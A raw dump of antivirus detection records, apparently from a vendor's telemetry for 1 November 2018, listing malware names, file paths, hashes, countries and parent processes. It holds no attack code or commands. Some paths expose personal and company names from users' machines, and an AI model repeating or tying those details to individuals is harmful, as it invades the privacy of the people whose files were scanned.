  Row(detection=Row(filename='avscan-20181101-155511-b97aa302', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155511-B97AA302', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143243-7820b50d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-142842-4F9964B3\\AVSCAN-20181101-143243-7820B50D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:32:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154922-7ecded6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154922-7ECDED6C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:49:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bpjs rpg.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\DOKUMENTASI\\dokumentasi bpjs rpg\\bpjs rpg.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='personal information (2) (2) (2) (2).exe', filepath='I:\\Personal information (2) (2) (2) (2).exe', filesize=512000, name='TR/Drop.Agent.bjxj.#M1.#R1'), hash='21d709b0593c19ad2798903ae02de7ecdbf8033b3e791b70d7595bca64b99721', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T12:20:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1538366\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Desktop\\optifine-1.13.exe', parentsize=2537352, timestamp='2018-11-01T14:42:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184201-a24db937', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-184120-9C2ABE8B\\AVSCAN-20181101-184201-A24DB937', filesize=64000, name='TR/Dldr.Script.sarmk.#M1.#R1'), hash='072bfde5fcec1822ca866eee949940153e6fba29fcd5a4ee02ddb4ff8632d8fc', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:42:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spinstall.exe', filepath='G:\\SPDMTK FILES\\Lenovo\\Lenovo_A606_S039_150604_ROW_(by_firmwarefile.com)\\Lenovo_A606_S039_150604_ROW\\Driver\\Auto Installer Driver v1.1236.00\\SmartPhoneDriver\\x86\\spinstall.exe', filesize=640000, name='W32/Sality.AG.#M1.#R1'), hash='26a1024a60ce7cd98daedd9eb498992487bb68d14863353108f6eded6ad73c7a', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BlueStacks\\HD-Network.exe', parentsize=451800, timestamp='2018-11-01T03:50:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110738-e15f43e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110738-E15F43E4', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='67f10537268acdfd45aa577ec35fb4aea6f0880ee2957f243795d1d936079303', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\67F10537268ACDFD45AA577EC35FB4AEA6F0880EE2957F243795D1D936079303', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='67f10537268acdfd45aa577ec35fb4aea6f0880ee2957f243795d1d936079303', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:17:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195059-c6b9aeec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-194803-A89BA1A8\\AVSCAN-20181101-195059-C6B9AEEC', filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:51:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122628-735de88c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122553-55E6B9D9\\AVSCAN-20181101-122628-735DE88C', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:26:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123416-028b7a0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123354-F028ECEE\\AVSCAN-20181101-123416-028B7A0C', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:34:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111249-0890c4ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111249-0890C4CE', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:12:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='95c45fa1ebfc6fb9ae18571480e6952e9adcba0a53bd164d8c3cfc1aca6d460c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\95C45FA1EBFC6FB9AE18571480E6952E9ADCBA0A53BD164D8C3CFC1ACA6D460C', filesize=448000, name='W32/Ramnit.C.#M1.#R1'), hash='95c45fa1ebfc6fb9ae18571480e6952e9adcba0a53bd164d8c3cfc1aca6d460c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:11:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eeeb205108e7d0233329c186f9b3aba2ac5fb669146c1dba54b4b1fad8697897', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\EEEB205108E7D0233329C186F9B3ABA2AC5FB669146C1DBA54B4B1FAD8697897', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='eeeb205108e7d0233329c186f9b3aba2ac5fb669146c1dba54b4b1fad8697897', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:22:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124851-ee11d974', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124832-DD7E965A\\AVSCAN-20181101-124851-EE11D974', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:48:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-192249-064c2a54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ab16be44\\AVSCAN-20181101-184303-2E317741\\AVSCAN-20181101-192249-064C2A54', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='7d74dd61060c0c11796f1bc3fc48e0a061a002c9a049758d5d7bd1a2912e3f8e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:22:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe air application installer.exe', filepath='C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Adobe AIR Application Installer.exe', filesize=72000, name='W32/Small.L.#M0.#R0'), hash='944e5569c61b5fc4a604ff731feb895b096d4aac47845669cf83c156bf0a1734', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T16:10:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172901-e252a536', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172500-D01F2DF7\\AVSCAN-20181101-172901-E252A536', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='a921e6759d3a6ab5a98dfb3058ccfb4bdf5287426ae7785d37f17f48becc13c4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:28:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nshAE3A.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:53:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111359-11704abe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111359-11704ABE', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124238-e78cd66f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06ca1b27\\AVSCAN-20181101-124140-DED58291\\AVSCAN-20181101-124238-E78CD66F', filesize=8000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='a670bdcefd413b2a44ae195fd7dc4f777d26e4a3083db3633ffbba757509376d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:42:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='da92ba169d2668bf2737f2c2c3d584f239e6fc56aa296dd3cce86500c60dcd3f', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T01:49:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111420-140327f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111420-140327F9', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:14:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='32. เพลงฮิตติดชาร์ท.exe', filepath='E:\\music\\1\\32. เพลงฮิตติดชาร์ท\\32. เพลงฮิตติดชาร์ท.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='a037df0866f3cacdfa2547c503cd4b2266199660f8825e529552a19d62c186ae', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:13:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft.NET\\msiexec64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T08:19:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dc2029.exe', filepath='C:\\RECYCLER\\S-1-5-21-602162358-57989841-1417001333-1003\\Dc2029.exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:46:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='media.bat', filepath='C:\\Users\\X\\Recorded TV\\Sample Media\\Media.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:36:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0125811.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0125811.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:42:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210342-81284c9d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2341bceb\\AVSCAN-20181101-210301-7B69AD58\\AVSCAN-20181101-210342-81284C9D', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:03:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-040506-c7ebb7b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a3a329b\\AVSCAN-20181101-040343-9631DB7C\\AVSCAN-20181101-040506-C7EBB7B4', filesize=64000, name='TR/Bladabindi.5f00cd.#M1.#R1'), hash='5f00cda5808e3fd126d452708308ddee6556cb83adaccd02efe83654a40fc641', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:06:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:57:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='javaws.exe', filepath='C:\\Users\\X\\alterland-launcher\\updates\\jre-8u131-win64\\bin\\javaws.exe', filesize=360000, name='W32/Neshta.A.#M1.#R1'), hash='5780857f84d31a0764c9a865bfe936cf45f146db5c69bd9ff5db3b842d5b93a9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe15_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe15 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T06:41:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='340e51857bf48387b47f14f4f96dc8acddff76fc152200bebed6a78071f03608', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='D:\\Games\\VIsland\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Games\\VIsland\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T23:41:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-173807-6bdce29e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4047052b\\AVSCAN-20181101-173627-62241F49\\AVSCAN-20181101-173807-6BDCE29E', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:37:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='restore.exe', filepath='\\?\\F:\\DaTa\\restore.exe', filesize=256000, name='TR/Crypt.ZPACK.Gen.#M300.#R3189'), hash='7cefac8ec68ed7e929c58824670abb87fafc7523b9a5226efd188b84335ed8ce', metadata=Row(cmdline=None, country='DK', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:39:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-audio-audiocore_31bf3856ad364e35_6.1.7601.23471_none_78ecb91b5c330d44\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='150c1ae293ee6c85c21683021670a64ec4944ff46f37c517373a82a958676835', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:17:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='D:\\VAG DLL\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\VAG DLL\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:33:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='civ3conquestsedit.exe', filepath='F:\\Infogrames Interactive\\Civilization III\\Conquests\\Civ3ConquestsEdit.exe', filesize=1472000, name='W32/Almanahe.C.#M1.#R1'), hash='60eaca1925c7cb8b96eb4a00edd054d96ef1a47bb10589ca66c0c058b9757dc8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MiIC1l\\\\\\/jbEyNM8o0.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:34:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylive.exe', filepath='C:\\Program Files\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:35:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T08:41:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183632-d0813243', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_94d1b712\\AVSCAN-20181101-183610-CC88322D\\AVSCAN-20181101-183632-D0813243', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:36:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libwrapper30.exe', filepath='C:\\Program Files\\Common Files\\Autodesk Shared\\Revit Shared\\LibWrapper30.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='1e9ab73a0817339d886f176ba1a482acc85bc63d39b35010d1383a75a8f6f2a7', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:10:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1_7_22_0.html', filepath='C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Adobe\\Photoshop 7.0\\Help\\1_7_22_0.html', filesize=264000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='70dc4b7638a3181d1dc908b6acfbbc3f351cf523072f97785e1b990659925ed8', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:21:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T08:14:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='r3.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\NELTEX SSS\\SSS2010\\NELTEX  MARCH. 2010\\R3.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='6100ba7cc4bc87f7c493933693f758a105d22b722b7d3f94a1051a553f5d9763', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:46:15Z'), dt=datetime.date(2018, 11, 1)),
